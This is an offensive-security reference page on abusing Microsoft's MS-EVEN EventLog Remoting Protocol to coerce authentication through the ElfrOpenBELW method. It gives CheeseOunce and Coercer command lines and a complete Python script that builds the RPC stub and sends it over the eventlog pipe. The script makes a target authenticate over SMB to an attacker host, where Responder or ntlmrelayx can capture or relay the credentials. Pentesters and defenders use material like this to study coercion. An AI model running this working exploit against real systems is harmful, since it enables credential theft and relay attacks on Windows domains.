MS-EVEN abuse (CheeseOunce)

Theory

MS-EVEN is Microsoft's EventLog Remoting Protocol. It provides an RPC interface for reading events in both live and backup event logs on remote computers. That interface is exposed over SMB through the \PIPE\eventlog named pipe (interface UUID 82273fdc-e32a-18c3-3f78-827929dc23ea, version 0.0). It is the legacy event log interface; the newer MS-EVEN6 is a separate protocol.

This protocol can be abused to coerce authentications. As with other MS-RPC coercion primitives, the trick is to call a method that takes a path the server will open on the caller's behalf. Here that method is ElfrOpenBELW, which opens a backup event log: the file to open is passed in its BackupFileName parameter. Supplying a UNC path that points at an attacker-controlled host makes the target's event log service connect to that host over SMB and authenticate to it, where the authentication can be captured or relayed.

Practice

CheeseOunce

The following Python proof-of-concept (https://github.com/evilashz/CheeseOunce) implements the ElfrOpenBELW method.

python cheese.py $DOMAIN/$USER:$PASSWORD@$TARGET_IP $ATTACKER_IP
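What a tool such as cheese.py does under the hood, shown as an added example (this is not code from CheeseOunce, Coercer, or the original page): the ElfrOpenBELW [in] stub is marshalled by hand so the placement of the UNC path is visible, a small parser recovers the path from a stub (useful when inspecting captured \pipe\eventlog traffic), and a sender binds to the pipe with impacket and ships the stub. Assumptions: impacket is installed for the live part only (the encoder and parser run offline), the `\??\UNC\<host>\<share>\<file>` NT-namespace spelling of the path, the share and file names, and the referent ID value, which can be any non-zero number.

```python
import struct

# Interface identity and transport, as specified in MS-EVEN.
MS_EVEN_UUID = "82273fdc-e32a-18c3-3f78-827929dc23ea"
MS_EVEN_VERSION = "0.0"
EVENTLOG_PIPE = r"\pipe\eventlog"
ELFR_OPEN_BELW_OPNUM = 9

# Both version fields MUST be set to 1 according to the protocol specification.
ELF_MAJOR_VERSION = 1
ELF_MINOR_VERSION = 1


def backup_file_path(listener_ip: str, share: str = "share", name: str = "backup.evtx") -> str:
    """Build the BackupFileName the target will try to open.

    Assumption: the NT-namespace UNC spelling (\\??\\UNC\\host\\share\\file). The share
    and file names are arbitrary; what matters is the host, which the target's
    SMB client will authenticate to.
    """
    return f"\\??\\UNC\\{listener_ip}\\{share}\\{name}"


def encode_elfr_open_belw(backup_file_name: str, referent_id: int = 0x00020000) -> bytes:
    """Hand-marshal the ElfrOpenBELW [in] parameters following NDR rules for the IDL:

        [in, unique] EVENTLOG_HANDLE_W UNCServerName  -> unique pointer, sent as NULL
        [in] PRPC_UNICODE_STRING BackupFileName       -> ref pointer: struct inline, its
                                                         Buffer is a conformant varying
                                                         WCHAR array marshalled after it
        [in] unsigned long MajorVersion, MinorVersion
    """
    buf = backup_file_name.encode("utf-16le")
    n_chars = len(buf) // 2
    stub = bytearray()
    stub += struct.pack("<L", 0)                      # UNCServerName = NULL
    stub += struct.pack("<HH", len(buf), len(buf))    # Length, MaximumLength (bytes)
    stub += struct.pack("<L", referent_id)            # Buffer referent, any non-zero id
    stub += struct.pack("<LLL", n_chars, 0, n_chars)  # MaxCount, Offset, ActualCount
    stub += buf                                       # WCHAR elements, no terminator
    stub += b"\x00" * (-len(stub) % 4)                # align to 4 before the ULONGs
    stub += struct.pack("<LL", ELF_MAJOR_VERSION, ELF_MINOR_VERSION)
    return bytes(stub)


def decode_backup_file_name(stub: bytes) -> str:
    """Recover the UNC path from a stub encoded as above (NULL UNCServerName only)."""
    if struct.unpack_from("<L", stub, 0)[0] != 0:
        raise ValueError("non-NULL UNCServerName is not handled by this parser")
    length, _max_length, buf_ref = struct.unpack_from("<HHL", stub, 4)
    if buf_ref == 0:
        return ""
    max_count, offset, actual = struct.unpack_from("<LLL", stub, 12)
    if actual > max_count or actual * 2 != length:
        raise ValueError("inconsistent conformant varying array")
    start = 24 + offset * 2
    return stub[start:start + actual * 2].decode("utf-16le")


def coerce(target_ip, username, password, domain, listener_ip, lmhash="", nthash=""):
    """Bind to \\pipe\\eventlog on the target and send the stub (impacket is imported
    here so the functions above stay usable without it). Returns the NTSTATUS in the
    response; an RPC fault raises DCERPCException. Either way, the coerced SMB
    authentication shows up at listener_ip, so check the listener, not the status."""
    from impacket.dcerpc.v5 import transport
    from impacket.uuid import uuidtup_to_bin

    rpctransport = transport.DCERPCTransportFactory(f"ncacn_np:{target_ip}[{EVENTLOG_PIPE}]")
    rpctransport.set_credentials(username, password, domain, lmhash, nthash)
    dce = rpctransport.get_dce_rpc()
    dce.connect()
    dce.bind(uuidtup_to_bin((MS_EVEN_UUID, MS_EVEN_VERSION)))
    stub = encode_elfr_open_belw(backup_file_path(listener_ip))
    dce.call(ELFR_OPEN_BELW_OPNUM, stub)   # raw stub, no NDRCALL class needed
    answer = dce.recv()                    # IELF_HANDLE (20 bytes) + NTSTATUS (4 bytes)
    dce.disconnect()
    return struct.unpack("<L", answer[-4:])[0]


if __name__ == "__main__":
    import sys
    # usage: python even_coerce.py DOMAIN USER PASSWORD TARGET_IP ATTACKER_IP
    domain, user, password, target, listener = sys.argv[1:6]
    print(hex(coerce(target, user, password, domain, listener)))
```

Run a listener (Responder or ntlmrelayx) on ATTACKER_IP first; the NTSTATUS returned by the target is usually an error, since the share does not serve a real backup log, and that is irrelevant to whether the authentication was coerced.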

Coercer

Another option is to use the Coercer tool (Python) as follows, filtering on the MS-EVEN protocol so that only its methods are tried.

coercer coerce -u $USER -p $PASSWORD -d $DOMAIN --filter-protocol-name MS-EVEN -l $ATTACKER_IP -t $TARGET_IP
